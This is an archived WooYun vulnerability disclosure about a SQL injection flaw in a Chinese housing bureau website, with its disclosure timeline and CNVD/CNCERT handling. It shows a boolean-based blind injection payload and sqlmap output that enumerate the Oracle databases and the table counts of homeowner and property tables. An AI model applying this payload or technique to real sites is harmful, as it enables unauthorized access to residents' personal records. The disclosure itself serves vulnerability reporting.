乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-11: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 细节向普通白帽子公开 2016-01-14: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
太费时间了
http://**.**.**.**/public/ZJJGInfo.aspx?code=176021
and 1=1 返回正常,and 1=2.没有数据返回存在注入
---Place: GETParameter: code Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: code=176021 AND 1085=1085---[16:10:59] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle
共20个数据库,房管局的数据库还是有很多住房人的信息的,不过没有找出来,但是找到了大量的房屋信息
[*] apex_030200[*] appqossys[*] ctxsys[*] dbsnmp[*] exfsys[*] flows_files[*] mdsys[*] olapsys[*] orddata[*] ordsys[*] outln[*] owbsys[*] scott[*] sys[*] sysman[*] system[*] wmsys[*] wsbalog[*] wsbayt[*] xdb
Database: ORDDATA+--------------------------+---------+| Table | Entries |+--------------------------+---------+| ORDDCM_DICT_ATTRS | 2418 || ORDDCM_STD_ATTRS | 2415 || ORDDCM_UID_DEFS | 245 || ORDDCM_CT_LOCATORPATHS | 95 || ORDDCM_CT_DAREFS | 72 || ORDDCM_CT_PRED | 61 || ORDDCM_CT_PRED_OPRD | 53 || ORDDCM_INTERNAL_TAGS | 42 || ORDDCM_ANON_ATTRS | 37 || ORDDCM_VR_DT_MAP | 32 || ORDDCM_PREFS_LOOKUP | 13 || ORDDCM_RT_PREF_PARAMS | 13 || ORDDCM_CT_PRED_SET | 9 || ORDDCM_DOCS | 9 || ORDDCM_INSTALL_DOCS | 9 || ORDDCM_DOC_TYPES | 8 || ORDDCM_CT_ACTION | 7 || ORDDCM_DOC_REFS | 7 || ORDDCM_ANON_ACTION_TYPES | 4 || ORDDCM_ANON_RULE_TYPES | 3 || ORDDCM_ANON_RULES | 3 || ORDDCM_CT_PRED_PAR | 3 || ORDDCM_PRV_ATTRS | 3 || ORDDCM_CT_MACRO_PAR | 2 || ORDDCM_CT_MACRO_DEP | 1 || ORDDCM_DATA_MODEL | 1 || ORDDCM_MAPPING_DOCS | 1 |+--------------------------+---------+
大量的数据
Database: WSBAYT+-------------------------+---------+| Table | Entries |+-------------------------+---------+| WSBA_UPLOADFILE | 375023 |上传文件| HPMS_ROOM | 138098 || NWRS_SPFOWNER | 132130 |商品房住户| LINK_YSSQ_ROOM | 129938 || LINK_ROOM_CERT | 118348 || NWRS_SELLBARGAIN_HTBA | 82154 || LINK_BARGAIN_ROOM | 75091 || LINK_MSG_RECEIVER | 74353 || NWRS_SELLBARGAIN | 73173 || PUBLIC_VISITOR | 54272 || DK_HPMS_ROOM | 34552 || TEST1 | 32126 || TEST2 | 30187 || SFSS_EXCHANGEMES | 23800 || SWRS_CQ_OWNER | 22963 || HPMS_YSSQDOCUMENT | 21845 || SFSS_OBJECTION | 21768 || LINK_YSSQDOC_FILE | 20688 || SWRS_LINK_BARGAIN_ROOM | 19635 || SWRS_SELLBARGAIN_HTBA | 19629 || SWRS_SELLBARGAIN | 19557 || SWRS_CQ_ROOM | 19429 || SWRS_WTBARGAIN | 19369 || SWRS_ISSUE | 19289 || SWRS_CQ_PROPERTY | 19173 || SFSS_JGSQ | 15486 || SFSS_ACCOUNT | 15383 || SFSS_SUPERVISEBARGAIN | 15383 || NWRS_BGSQ | 14333 || SFSS_DEPOSIT | 12746 || WSBA_MESSAGE | 12590 || LINK_BUILD_CERT | 12200 || SFSS_DRAW | 10685 || XTSZ_DAYSERIAL | 5589 || SYS_IMPORT_FULL_01 | 4201 || BAK_LINK_ROOM_CERT | 2802 || DK_BUILD_UNIT | 2228 || NWRS_TFSQ | 1907 || SPF_AJBADJSQB | 1905 || HPMS_BUILD | 1730 || BAK_ROOM_VFWID | 1532 || BAK_NWRS_SELLBARGAIN | 1498 || LINK_OLDFWZTSQ_ROOMCODE | 1484 || SWRS_TFSQ | 1468 || DK_HTBG_REL | 1365 || HPMS_YSSQ | 1260 || HPMS_YSXKZ | 1240 || SFSS_TOTALACCOUNT | 1215 || LINK_ROOM_CERT_DEL | 1004 || NWRS_SELLBARGAINMB | 742 || LINK_XSRY_PROJECT | 564 || XTSZ_USER | 554 || HPMS_JSGCGHXKZ | 552 || HPMS_JZGCSGXKZ | 548 || HEMS_PERSON | 536 || XTSZ_MKQX | 514 || HPMS_JSYDGHXKZ | 511 || HPMS_TDSYQZ | 493 || XTSZ_CODEB | 423 || HPMS_PROJECT | 372 || SFSS_BGSQ | 337 || SFSS_CXSQ | 325 || HEMS_COMPANY | 304 || XTSZ_MK | 251 || DK_HEMS_PERSON | 239 || HPMS_OLD_BAZXSQ | 235 || TMP_FWID_OFWID | 159 || HPMS_OLD_LPDR_FW | 140 || DK_BUILD_PROJECTCODEIS0 | 108 || HPMS_OLD_LPDR_OFW | 97 || SWRS_LEASEBARGAIN | 96 || HPMS_OLD_LPDR | 83 || HPMS_GCXXJD | 82 || DK_HEMS_COMPANY | 78 || HEMS_QYXXBGSQ | 74 || XTSZ_CBC | 73 || XTSZ_MKFL | 68 || HPMS_BUILDTABLE_CACHE | 61 || HPMS_OLD_ZJZXSQ | 53 || XTSZ_UCCOMPANY | 52 || HPMS_OLD_CFSQ | 51 || NFSS_SPECIALXKZ | 48 || NFSS_SPECIALXKZLOG | 48 || XTSZ_UCPERSON | 45 || NWRS_BOOKBARGAIN | 35 || XTSZ_FORMINFO | 34 || HPMS_OLD_AJZXSQ | 33 || IMP_OLDBUILDS | 31 || XTSZ_FIELDCONFIG | 31 || XTSZ_SYSROLCACHE | 31 || DOFF_ACCOUNTLINKMETHOD | 29 || HPMS_OLD_XZSQ | 29 || HPMS_OLD_CFZXSQ | 28 || HPMS_YSSQZL_TEMPLATE | 17 || HPMS_XMDHXX | 16 || XTSZ_ROLE | 14 || XTSZ_SERIALCONFIG | 14 || NWRS_BARGAIN_TEMPLATE | 12 || XTSZ_COMPANY_NOPUB | 10 || YW_CODEB | 9 || XTSZ_SYSTEM | 8 || HPMS_YSXKZ_DEL | 7 || XTSZ_QUERYCODE | 7 || XTSZ_KEYLOG | 5 || XTSZ_TREECACHE | 5 || XTSZ_UCCONFIGTREEINFO | 5 || XTSZ_YEARSERIAL | 5 || DOFF_ACCOUNT | 4 || LINK_KFQYDLS_LICENCE | 3 || NWRS_SBSUPPLY | 3 || HPMS_YSXKZ_YSJGZH | 2 || LINK_JGSQ_YSJGZH | 2 || NFSS_BANKNET | 2 || NFSS_JGSQ | 2 || SFSS_INTERESTRATE | 2 || XTSZ_ENTERMODULE | 2 || LINK_PROJECT_SPECIALKQY | 1 || PUBLIC_BACKINFO | 1 || SWRS_LEASEBARGAINHTBA | 1 || YW_CBC | 1 |+-------------------------+---------+
Database: CTXSYS+-------------------------+---------+| Table | Entries |+-------------------------+---------+| DR$OBJECT_ATTRIBUTE | 512 || DR$DBO | 362 || DR$NUMBER_SEQUENCE | 256 || DR$OBJECT_ATTRIBUTE_LOV | 168 || DR$INDEX_VALUE | 86 || DR$STOPWORD | 76 || DR$OBJECT | 53 || DR$INDEX_OBJECT | 36 || DR$PARAMETER | 33 || DR$PREFERENCE | 30 || DR$PREFERENCE_VALUE | 20 || DR$FEATURE_USED | 17 || DR$CLASS | 13 || DR$SECTION_GROUP | 5 || DR$INDEX | 4 || DR$STOPLIST | 3 || DR$INDEX_SET | 1 |+-------------------------+---------+
这个网站注入比较多,建议线下测试好了更换新系统
危害等级:中
漏洞Rank:10
确认时间:2015-12-15 15:00
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由河南分中心后续协调网站管理单位处置。
暂无